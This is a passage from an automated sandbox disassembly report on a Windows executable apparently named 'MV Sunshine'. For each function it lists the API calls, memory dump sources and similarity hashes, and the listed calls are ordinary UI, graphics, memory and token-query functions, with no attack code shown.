SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00679802

Part of subcall function 00627D2C: _memmove.LIBCMT ref: 00627D66

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00679834
__itow.LIBCMT ref: 0067984C
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00679874
__itow.LIBCMT ref: 00679885

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 6a0c282b6725c54164dfba97ddaf3b03c81b5db587a54de729d9a56f064d6ae8
Instruction ID: 5af47d1574233f60b92119ea1b40d11c65e4b335d4c5e56cf3517f548df0780e
Opcode Fuzzy Hash: 6a0c282b6725c54164dfba97ddaf3b03c81b5db587a54de729d9a56f064d6ae8
Instruction Fuzzy Hash: EC21B831600214ABDB10AB659C86EEE7BFADF4A710F084429F90897351D6709D418BE6

Function 006212F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0062134D
SelectObject.GDI32(?,00000000), ref: 0062135C
BeginPath.GDI32(?), ref: 00621373
SelectObject.GDI32(?,00000000), ref: 0062139C

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: c4a3d6ac9b80cd59b702eb96233a1b43c8448d055739128947067fa63b035eb3
Instruction ID: fdd5fc9133ab3a86141efaad8b3931c2b6f0e7e6b006e9883f421d16f7098aa5
Opcode Fuzzy Hash: c4a3d6ac9b80cd59b702eb96233a1b43c8448d055739128947067fa63b035eb3
Instruction Fuzzy Hash: DE219270914754EFDB10DF65EC447AE3BBBFB223A1F145225F8109A2A0D371A895CFA1

Function 0067C161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0067C176
_memcmp.LIBCMT ref: 0067C194
_memcmp.LIBCMT ref: 0067C1A7
_memcmp.LIBCMT ref: 0067C1BF
_memcmp.LIBCMT ref: 0067C1D7

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 9f03bee70e9744d0f445d08dd6ef3562c72f35333905c8cc43e072d7c024e06a
Instruction ID: 829c46f05f72cce28126b14ac829471c6d45085b433251fdf3a34ca9e6945484
Opcode Fuzzy Hash: 9f03bee70e9744d0f445d08dd6ef3562c72f35333905c8cc43e072d7c024e06a
Instruction Fuzzy Hash: 1E0192A16041067BE604A6209C52EEB67DF9B223B4B85813DFD089A383FB50DE5183A4

Function 00684D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00684D5C
__beginthreadex.LIBCMT ref: 00684D7A
MessageBoxW.USER32(?,?,?,?), ref: 00684D8F
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00684DA5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00684DAC

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 733efb23067e2cd772aff96af623a510f0eed786cf46d956f206bf31718b013a
Instruction ID: c70a85762ae1226e229930eb0c1e979c43ae8b79ec178dee6f9536f36424d369
Opcode Fuzzy Hash: 733efb23067e2cd772aff96af623a510f0eed786cf46d956f206bf31718b013a
Instruction Fuzzy Hash: 36110872904245BFCB01ABA8DC44ADA7FAEEB45320F144365F914D7351DA719D048BA1

Function 0067874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00678766
GetLastError.KERNEL32(?,0067822A,?,?,?), ref: 00678770
GetProcessHeap.KERNEL32(00000008,?,?,0067822A,?,?,?), ref: 0067877F
HeapAlloc.KERNEL32(00000000,?,0067822A,?,?,?), ref: 00678786
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0067879D

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 31808fea3b78362568ac7b059de5521957c93b88936778102e073ebb0362e9bc
Instruction ID: 9223df865bccf2f27ef51b5fb088b9cedad43861f10bd797c0576a5293c748c6
Opcode Fuzzy Hash: 31808fea3b78362568ac7b059de5521957c93b88936778102e073ebb0362e9bc
Instruction Fuzzy Hash: 34014F71240204EFDB245FAADC4CDAB7B6EEF863557204429F84AC3260DA31DC00CEA1

Function 006854E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00685502
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00685510
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00685518
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00685522
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0068555E

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 530b6509b0628d62e5734b6fe2e8eee0644dc76fdea662f5e7e929626095bbcb
Instruction ID: 54303e06c4f88ab7d6b53bbc80bd29787b044e94ef5b5ba25f83cf827786c10d
Opcode Fuzzy Hash: 530b6509b0628d62e5734b6fe2e8eee0644dc76fdea662f5e7e929626095bbcb
Instruction Fuzzy Hash: 82012135D00A1DDBCF00FFE5E8495EDBB7AFB09711F400596E942B2240DB305A55CBA2

Function 00677652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0067758C,80070057,?,?,?,0067799D), ref: 0067766F
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0067758C,80070057,?,?), ref: 0067768A
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0067758C,80070057,?,?), ref: 00677698
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0067758C,80070057,?), ref: 006776A8
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0067758C,80070057,?,?), ref: 006776B4

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: cc4c0562b9586d1c964ae1b56e87bdb6aba9b853e925eff5326da773e24f5c80
Instruction ID: 4ead645a5596e807462867a8b59ad4f9e3cee1670d05add9dcc2ba52ae5b3c48
Opcode Fuzzy Hash: cc4c0562b9586d1c964ae1b56e87bdb6aba9b853e925eff5326da773e24f5c80
Instruction Fuzzy Hash: E901D476600604FBDB106F58DC04BAABBBEEB45751F204128FD08D2225E735EE008BA0

Function 006785F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00678608
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00678612
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00678621
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00678628
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0067863E

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 0a4d714d98111095989e475b630a1c351074ec31852dc77e19cf99b9786094bf
Instruction ID: cb7b283c840fff3b7739493594f3b34f3fb27e72fbfa2dd1ac6048c9e80a6241
Opcode Fuzzy Hash: 0a4d714d98111095989e475b630a1c351074ec31852dc77e19cf99b9786094bf
Instruction Fuzzy Hash: A1F04F31241204BFEB101FE5DC9DEAB3BAEEF8A755B004425F94DC7250CBA1AD41DE61

Function 00678652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00678669
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00678673
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00678682
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00678689
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0067869F

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 1311948796382c99daebec635f2b2eb278ceea4c7b9aa43289895e135ca3f999
Instruction ID: bf37762ba86a9b73aafe8b80663c3330a6bbacadf7ae8accc2b7393cc113ce0b
Opcode Fuzzy Hash: 1311948796382c99daebec635f2b2eb278ceea4c7b9aa43289895e135ca3f999
Instruction Fuzzy Hash: CAF04471240214BFDB112FA5DC8CEA73BAEEF46755B100025F549C7250DB61AD41DE62

Function 0067C6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0067C6BA
GetWindowTextW.USER32(00000000,?,00000100), ref: 0067C6D1
MessageBeep.USER32(00000000), ref: 0067C6E9
KillTimer.USER32(?,0000040A), ref: 0067C705
EndDialog.USER32(?,00000001), ref: 0067C71F

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 897c9abfd1412139dab84a25ba7e2e95cec7801f60fba90523687c7e9bb284e3
Instruction ID: c3225701957b4ae5ba0a837fddc39bdf99e8aa93fa5ffa7b86eab8756ad20a16
Opcode Fuzzy Hash: 897c9abfd1412139dab84a25ba7e2e95cec7801f60fba90523687c7e9bb284e3
Instruction Fuzzy Hash: F401A230400704ABEB24AF60EC8EF9677BAFF01701F00566DF586A14E1DBE0A9548F91

Function 006213B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 006213BF
StrokeAndFillPath.GDI32(?,?,0065BAD8,00000000,?), ref: 006213DB
SelectObject.GDI32(?,00000000), ref: 006213EE
DeleteObject.GDI32 ref: 00621401
StrokePath.GDI32(?), ref: 0062141C

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 27470ae03fe91ab82aadab38dc203df77460206c513cf32db7594e2e94a01fe6
Instruction ID: b76607bef88cd3aefcf17c1a17adb11b3d54bce4284ee6c0d70eb92c9aab70e0
Opcode Fuzzy Hash: 27470ae03fe91ab82aadab38dc203df77460206c513cf32db7594e2e94a01fe6
Instruction Fuzzy Hash: F2F01D30024748DBDB156F56EC4C7593BA7AB22366F04A224F4694C1F1C73159A5DF21

Function 00632E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00640FF6: std::exception::exception.LIBCMT ref: 0064102C
Part of subcall function 00640FF6: __CxxThrowException@8.LIBCMT ref: 00641041

Part of subcall function 00627F41: _memmove.LIBCMT ref: 00627F82

Part of subcall function 00627BB1: _memmove.LIBCMT ref: 00627C0B

__swprintf.LIBCMT ref: 0063302D

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00632EC6

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 35fb0f8716978bb7348b969fa0882578b6f32732ad7286d5b2efba9783f835c4
Instruction ID: 104a6c344b3462095c67a848db9af60b83255ab775f9b50b59df329d21a4646c
Opcode Fuzzy Hash: 35fb0f8716978bb7348b969fa0882578b6f32732ad7286d5b2efba9783f835c4
Instruction Fuzzy Hash: F1918D71108721AFC768EF24E885CAFB7A6EF85750F00491DF4429B2A1DB30EE44CB96

Function 0067B7B6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0067B981

Strings

%k, xrefs: 0067BA24
AutoIt3GUI, xrefs: 0067B8F9
Container, xrefs: 0067B8FE

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container$%k
API String ID: 3565006973-671182982
Opcode ID: 5a02d9230dea435bef12e31a87429e665f6bf27cb6562d2e87545783f2d180de
Instruction ID: f59cb6cfc6a86f009ab36f9c9eac74112fab3feddd0ff1e96d15f2f7c9d5bcfc
Opcode Fuzzy Hash: 5a02d9230dea435bef12e31a87429e665f6bf27cb6562d2e87545783f2d180de
Instruction Fuzzy Hash: 86913A706006019FDB64DF64C884BAABBFAFF49710F14956EE949CB791DB70E841CB60

Function 0064524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 006452DD

Part of subcall function 00650340: __87except.LIBCMT ref: 0065037B

Strings

pow, xrefs: 006452B5, 006452D2

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 6fc491e90d28f24ac1c6242890a7d3244ceb60f9e9d5f39dc9902ae81b18bb7a
Instruction ID: c40364e4cc3a80d9dffdb64bffca4338110927bbb9192b5343c0ad6742971439
Opcode Fuzzy Hash: 6fc491e90d28f24ac1c6242890a7d3244ceb60f9e9d5f39dc9902ae81b18bb7a
Instruction Fuzzy Hash: 15515A61A0D602C7EB126B24C9413FE2BD39B40751F20895DE896863E7EF74CDDC9A46

Function 0064023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

+, xrefs: 00640277
#, xrefs: 00640280

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 57b6780227f3cdd532fbdaca9a56abf60a80b56d0b18fe4aabf0efacda039930
Instruction ID: 92e34a07a04d948e9136ea495a5ec54abdd34ee5ed12c07391d8f66c76519484
Opcode Fuzzy Hash: 57b6780227f3cdd532fbdaca9a56abf60a80b56d0b18fe4aabf0efacda039930
Instruction Fuzzy Hash: 40515735504656DFDF25DF28C488AFA7BA6EF1A310F148099FC969B3A0D7B09C42CB64

Function 00633297 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 006333D7
_memmove.LIBCMT ref: 00633470
_free.LIBCMT ref: 00633496
_memmove.LIBCMT ref: 00633549

Strings

Oac, xrefs: 00633482

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: _memmove$_free
String ID: Oac
API String ID: 2620147621-752515563
Opcode ID: 4177c5109bf103a8e67aeacb9d4d55e33393e4d8437707f620a3c4b3b09e5f9d
Instruction ID: 8aa7564288e0c0e382cc11168094ceb5d0d100e3d52b27914e0f3c18f7cf1649
Opcode Fuzzy Hash: 4177c5109bf103a8e67aeacb9d4d55e33393e4d8437707f620a3c4b3b09e5f9d
Instruction Fuzzy Hash: C5515A71A083519FDB64CF28C891B6BBBE6BF85314F04492DE989C7351DB31EA41CB92

Function 006362F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006363A8
_memmove.LIBCMT ref: 00636446
_memset.LIBCMT ref: 0063646A

Strings

ERCP, xrefs: 00636313

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 981d4e2e997f1b81b6f954fc3e80f10b5c81d8d9af810993e1444560540156a1
Instruction ID: 5d54b0ce08c3aef74b617b636084185bdc84df39b5b7617738d3074f257da368
Opcode Fuzzy Hash: 981d4e2e997f1b81b6f954fc3e80f10b5c81d8d9af810993e1444560540156a1
Instruction Fuzzy Hash: C1519E71900319EBDB24CF65C881BEABBF6EF04714F20C56EE64ACA341E7719585CB84

Function 006A7648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 006A76D0
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 006A76E4
SendMessageW.USER32(?,00001002,00000000,?), ref: 006A7708

Strings

SysMonthCal32, xrefs: 006A769B

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
